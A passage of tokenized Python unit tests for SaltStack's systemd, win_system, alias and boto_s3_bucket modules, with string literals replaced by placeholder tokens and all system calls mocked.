self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> with patch . object ( systemd , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : { '<STR_LIT:path>' : '<STR_LIT:c>' } } ) <EOL> with patch . object ( systemd , '<STR_LIT>' , mock ) : <EOL> self . assertDictEqual ( systemd . execs ( ) , { '<STR_LIT:a>' : '<STR_LIT:c>' , '<STR_LIT:b>' : '<STR_LIT:c>' } ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( SystemdTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from datetime import datetime <EOL> from salttesting import TestCase , skipIf <EOL> from salttesting . helpers import ensure_in_syspath <EOL> from salttesting . mock import ( <EOL> MagicMock , <EOL> patch , <EOL> NO_MOCK , <EOL> NO_MOCK_REASON <EOL> ) <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . modules import win_system <EOL> try : <EOL> import win32net <EOL> import win32api <EOL> import pywintypes <EOL> from ctypes import windll <EOL> HAS_WIN32NET_MODS = True <EOL> except ImportError : <EOL> HAS_WIN32NET_MODS = False <EOL> win_system . __salt__ = { } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class WinSystemTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_halt ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . object ( win_system , '<STR_LIT>' , mock ) : <EOL> self . assertEqual ( win_system . halt ( ) , '<STR_LIT>' ) <EOL> def test_init ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . assertEqual ( win_system . init ( <NUM_LIT:3> ) , <EOL> '<STR_LIT>' ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_poweroff ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . object ( win_system , '<STR_LIT>' , mock ) : <EOL> self . assertEqual ( win_system . poweroff ( ) , '<STR_LIT>' ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_reboot ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( win_system . reboot ( ) , '<STR_LIT>' ) <EOL> mock . assert_called_once_with ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , python_shell = False ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_reboot_with_timeout_in_minutes ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( win_system . reboot ( <NUM_LIT:5> , in_seconds = False ) , '<STR_LIT>' ) <EOL> mock . assert_called_once_with ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , python_shell = False ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_reboot_with_timeout_in_seconds ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( win_system . reboot ( <NUM_LIT:5> , in_seconds = True ) , '<STR_LIT>' ) <EOL> mock . assert_called_once_with ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:5>' ] , python_shell = False ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_reboot_with_wait ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> sleep_mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> with patch ( '<STR_LIT>' , sleep_mock ) : <EOL> self . assertEqual ( win_system . reboot ( wait_for_reboot = True ) , '<STR_LIT>' ) <EOL> mock . assert_called_once_with ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , python_shell = False ) <EOL> sleep_mock . assert_called_once_with ( <NUM_LIT> ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_shutdown ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( win_system . shutdown ( ) , '<STR_LIT>' ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_shutdown_hard ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( win_system . shutdown_hard ( ) , '<STR_LIT>' ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_set_computer_name ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( side_effect = [ { '<STR_LIT>' : { '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : True } , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ] ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . object ( win_system , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( win_system , <EOL> '<STR_LIT>' , mock ) : <EOL> self . assertDictEqual ( win_system . set_computer_name ( "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } } ) <EOL> self . assertFalse ( win_system . set_computer_name ( "<STR_LIT>" ) ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_get_pending_computer_name ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . object ( win_system , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( side_effect = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertFalse ( win_system . get_pending_computer_name ( ) ) <EOL> self . assertEqual ( win_system . get_pending_computer_name ( ) , <EOL> '<STR_LIT>' ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_get_computer_name ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( side_effect = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( win_system . get_computer_name ( ) , '<STR_LIT>' ) <EOL> self . assertFalse ( win_system . get_computer_name ( ) ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_set_computer_desc ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> mock = MagicMock ( return_value = "<STR_LIT>" ) <EOL> with patch . object ( win_system , '<STR_LIT>' , mock ) : <EOL> self . assertDictEqual ( win_system . set_computer_desc ( <EOL> "<STR_LIT>" <EOL> ) , <EOL> { '<STR_LIT>' : "<STR_LIT>" } ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_get_computer_desc ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( side_effect = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( win_system . get_computer_desc ( ) , '<STR_LIT>' ) <EOL> self . assertFalse ( win_system . get_computer_desc ( ) ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_join_domain ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( side_effect = [ { '<STR_LIT>' : True } , <EOL> { '<STR_LIT>' : True } ] ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertDictEqual ( win_system . join_domain ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertFalse ( win_system . join_domain ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) ) <EOL> def test_get_system_time ( self ) : <EOL> '''<STR_LIT>''' <EOL> tm = datetime . strftime ( datetime . now ( ) , "<STR_LIT>" ) <EOL> win_tm = win_system . get_system_time ( ) <EOL> try : <EOL> self . assertEqual ( win_tm , tm ) <EOL> except AssertionError : <EOL> import re <EOL> self . assertTrue ( re . search ( r'<STR_LIT>' , win_tm ) ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_set_system_time ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( side_effect = [ False , True ] ) <EOL> with patch . object ( win_system , '<STR_LIT>' , mock ) : <EOL> self . assertFalse ( win_system . set_system_time ( "<STR_LIT>" ) ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertFalse ( win_system . set_system_time ( "<STR_LIT>" ) ) <EOL> def test_get_system_date ( self ) : <EOL> '''<STR_LIT>''' <EOL> date = datetime . strftime ( datetime . now ( ) , "<STR_LIT>" ) <EOL> self . assertEqual ( win_system . get_system_date ( ) , date ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_set_system_date ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( side_effect = [ False , True ] ) <EOL> with patch . object ( win_system , '<STR_LIT>' , mock ) : <EOL> self . assertFalse ( win_system . set_system_date ( "<STR_LIT>" ) ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertFalse ( win_system . set_system_date ( "<STR_LIT>" ) ) <EOL> def test_start_time_service ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertTrue ( win_system . start_time_service ( ) ) <EOL> def test_stop_time_service ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertTrue ( win_system . stop_time_service ( ) ) <EOL> def test_set_hostname ( self ) : <EOL> '''<STR_LIT>''' <EOL> cmd_run_mock = MagicMock ( return_value = "<STR_LIT>" ) <EOL> get_hostname = MagicMock ( return_value = "<STR_LIT>" ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : cmd_run_mock } ) : <EOL> with patch . object ( win_system , '<STR_LIT>' , get_hostname ) : <EOL> win_system . set_hostname ( "<STR_LIT>" ) <EOL> cmd_run_mock . assert_called_once_with ( cmd = "<STR_LIT>" ) <EOL> def test_get_hostname ( self ) : <EOL> '''<STR_LIT>''' <EOL> cmd_run_mock = MagicMock ( return_value = "<STR_LIT>" ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : cmd_run_mock } ) : <EOL> ret = win_system . get_hostname ( ) <EOL> self . assertEqual ( ret , "<STR_LIT>" ) <EOL> cmd_run_mock . assert_called_once_with ( cmd = "<STR_LIT>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( WinSystemTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import skipIf , TestCase <EOL> from salttesting . helpers import ensure_in_syspath <EOL> from salttesting . mock import ( <EOL> NO_MOCK , <EOL> NO_MOCK_REASON , <EOL> MagicMock , <EOL> patch <EOL> ) <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . states import alias <EOL> alias . __opts__ = { } <EOL> alias . __salt__ = { } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class AliasTest ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_present_has_target ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> target = '<STR_LIT>' <EOL> ret = { '<STR_LIT>' : '<STR_LIT>' . format ( name ) , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True } <EOL> has_target = MagicMock ( return_value = True ) <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : has_target } ) : <EOL> self . assertEqual ( alias . present ( name , target ) , ret ) <EOL> def test_present_has_not_target_test ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> target = '<STR_LIT>' <EOL> ret = { '<STR_LIT>' : '<STR_LIT>' . format ( name , target ) , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : None } <EOL> has_target = MagicMock ( return_value = False ) <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : has_target } ) : <EOL> with patch . dict ( alias . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> self . assertEqual ( alias . present ( name , target ) , ret ) <EOL> def test_present_set_target ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> target = '<STR_LIT>' <EOL> ret = { '<STR_LIT>' : '<STR_LIT>' . format ( name , target ) , <EOL> '<STR_LIT>' : { '<STR_LIT>' : name } , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True } <EOL> has_target = MagicMock ( return_value = False ) <EOL> set_target = MagicMock ( return_value = True ) <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : has_target } ) : <EOL> with patch . dict ( alias . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : set_target } ) : <EOL> self . assertEqual ( alias . present ( name , target ) , ret ) <EOL> def test_present_set_target_failed ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> target = '<STR_LIT>' <EOL> ret = { '<STR_LIT>' : '<STR_LIT>' . format ( name , target ) , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : False } <EOL> has_target = MagicMock ( return_value = False ) <EOL> set_target = MagicMock ( return_value = False ) <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : has_target } ) : <EOL> with patch . dict ( alias . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : set_target } ) : <EOL> self . assertEqual ( alias . present ( name , target ) , ret ) <EOL> def test_absent_already_gone ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> target = '<STR_LIT>' <EOL> ret = { '<STR_LIT>' : '<STR_LIT>' . format ( name ) , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True } <EOL> get_target = MagicMock ( return_value = False ) <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : get_target } ) : <EOL> self . assertEqual ( alias . absent ( name ) , ret ) <EOL> def test_absent_not_gone_test ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> target = '<STR_LIT>' <EOL> ret = { '<STR_LIT>' : '<STR_LIT>' . format ( name ) , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : None } <EOL> get_target = MagicMock ( return_value = True ) <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : get_target } ) : <EOL> with patch . dict ( alias . __opts__ , { '<STR_LIT:test>' : True } ) : <EOL> self . assertEqual ( alias . absent ( name ) , ret ) <EOL> def test_absent_rm_alias ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> target = '<STR_LIT>' <EOL> ret = { '<STR_LIT>' : '<STR_LIT>' . format ( name ) , <EOL> '<STR_LIT>' : { '<STR_LIT>' : name } , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True } <EOL> get_target = MagicMock ( return_value = True ) <EOL> rm_alias = MagicMock ( return_value = True ) <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : get_target } ) : <EOL> with patch . dict ( alias . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : rm_alias } ) : <EOL> self . assertEqual ( alias . absent ( name ) , ret ) <EOL> def test_absent_rm_alias_failed ( self ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> target = '<STR_LIT>' <EOL> ret = { '<STR_LIT>' : '<STR_LIT>' . format ( name ) , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : False } <EOL> get_target = MagicMock ( return_value = True ) <EOL> rm_alias = MagicMock ( return_value = False ) <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : get_target } ) : <EOL> with patch . dict ( alias . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> with patch . dict ( alias . __salt__ , { '<STR_LIT>' : rm_alias } ) : <EOL> self . assertEqual ( alias . absent ( name ) , ret ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( AliasTest , needs_daemon = False ) </s>
<s> from __future__ import absolute_import <EOL> from distutils . version import LooseVersion <EOL> from copy import deepcopy <EOL> import random <EOL> import string <EOL> from salttesting . unit import skipIf , TestCase <EOL> from salttesting . mock import NO_MOCK , NO_MOCK_REASON , patch <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> import salt . config <EOL> import salt . loader <EOL> import logging <EOL> from salttesting . mock import NO_MOCK , NO_MOCK_REASON , MagicMock , patch <EOL> from unit . modules . boto_s3_bucket_test import BotoS3BucketTestCaseMixin <EOL> try : <EOL> import boto <EOL> import boto3 <EOL> from botocore . exceptions import ClientError <EOL> HAS_BOTO = True <EOL> except ImportError : <EOL> HAS_BOTO = False <EOL> required_boto3_version = '<STR_LIT>' <EOL> log = logging . getLogger ( __name__ ) <EOL> opts = salt . config . DEFAULT_MINION_OPTS <EOL> context = { } <EOL> utils = salt . loader . utils ( opts , whitelist = [ '<STR_LIT>' ] , context = context ) <EOL> serializers = salt . loader . serializers ( opts ) <EOL> funcs = salt . loader . minion_mods ( opts , context = context , utils = utils , whitelist = [ '<STR_LIT>' ] ) <EOL> salt_states = salt . loader . states ( opts = opts , functions = funcs , utils = utils , whitelist = [ '<STR_LIT>' ] , serializers = serializers ) <EOL> def _has_required_boto ( ) : <EOL> '''<STR_LIT>''' <EOL> if not HAS_BOTO : <EOL> return False <EOL> elif LooseVersion ( boto3 . __version__ ) < LooseVersion ( required_boto3_version ) : <EOL> return False <EOL> else : <EOL> return True <EOL> if _has_required_boto ( ) : <EOL> region = '<STR_LIT>' <EOL> access_key = '<STR_LIT>' <EOL> secret_key = '<STR_LIT>' <EOL> conn_parameters = { '<STR_LIT>' : region , '<STR_LIT:key>' : access_key , '<STR_LIT>' : secret_key , '<STR_LIT>' : { } } <EOL> error_message = '<STR_LIT>' <EOL> not_found_error = ClientError ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } <EOL> } , '<STR_LIT>' ) <EOL> error_content = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } <EOL> } <EOL> list_ret = { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT:Name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None <EOL> } ] , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> config_in = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : [ "<STR_LIT:GET>" ] , <EOL> '<STR_LIT>' : [ "<STR_LIT:*>" ] , <EOL> } ] , <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <NUM_LIT:1> <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ] , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ "<STR_LIT>" ] , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT:Name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:string>' <EOL> } ] <EOL> } <EOL> } <EOL> } ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } <EOL> } ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:a>' : '<STR_LIT:b>' , <EOL> '<STR_LIT:c>' : '<STR_LIT:d>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } <EOL> config_ret = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ] , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : [ "<STR_LIT:GET>" ] , <EOL> '<STR_LIT>' : [ "<STR_LIT:*>" ] , <EOL> } ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <NUM_LIT:1> <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ "<STR_LIT>" ] , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT:Name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:string>' <EOL> } ] <EOL> } <EOL> } <EOL> } ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } <EOL> } ] <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : '<STR_LIT:c>' , <EOL> '<STR_LIT>' : '<STR_LIT:d>' <EOL> } , { <EOL> '<STR_LIT>' : '<STR_LIT:a>' , <EOL> '<STR_LIT>' : '<STR_LIT:b>' , <EOL> } ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } <EOL> bucket_ret = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> class BotoS3BucketStateTestCaseBase ( TestCase ) : <EOL> conn = None <EOL> def setUp ( self ) : <EOL> context . clear ( ) <EOL> conn_parameters [ '<STR_LIT:key>' ] = '<STR_LIT>' . join ( random . choice ( string . ascii_lowercase + string . digits ) for _ in range ( <NUM_LIT:50> ) ) <EOL> self . patcher = patch ( '<STR_LIT>' ) <EOL> self . addCleanup ( self . patcher . stop ) <EOL> mock_session = self . patcher . start ( ) <EOL> session_instance = mock_session . return_value <EOL> self . conn = MagicMock ( ) <EOL> session_instance . client . return_value = self . conn <EOL> @ skipIf ( HAS_BOTO is False , '<STR_LIT>' ) <EOL> @ skipIf ( _has_required_boto ( ) is False , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( required_boto3_version ) ) <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class BotoS3BucketTestCase ( BotoS3BucketStateTestCaseBase , BotoS3BucketTestCaseMixin ) : <EOL> '''<STR_LIT>''' <EOL> def test_present_when_bucket_does_not_exist ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . conn . head_bucket . side_effect = [ not_found_error , None ] <EOL> self . conn . list_buckets . return_value = deepcopy ( list_ret ) <EOL> self . conn . create_bucket . return_value = bucket_ret <EOL> for key , value in config_ret . iteritems ( ) : <EOL> getattr ( self . conn , key ) . return_value = deepcopy ( value ) <EOL> with patch . dict ( funcs , { '<STR_LIT>' : MagicMock ( return_value = '<STR_LIT>' ) } ) : <EOL> result = salt_states [ '<STR_LIT>' ] ( <EOL> '<STR_LIT>' , <EOL> Bucket = '<STR_LIT>' , <EOL> ** config_in <EOL> ) <EOL> self . assertTrue ( result [ '<STR_LIT:result>' ] ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] , config_ret [ '<STR_LIT>' ] ) <EOL> def test_present_when_bucket_exists_no_mods ( self ) : <EOL> self . conn . list_buckets . return_value = deepcopy ( list_ret ) <EOL> for key , value in config_ret . iteritems ( ) : <EOL> getattr ( self . conn , key ) . return_value = deepcopy ( value ) <EOL> with patch . dict ( funcs , { '<STR_LIT>' : MagicMock ( return_value = 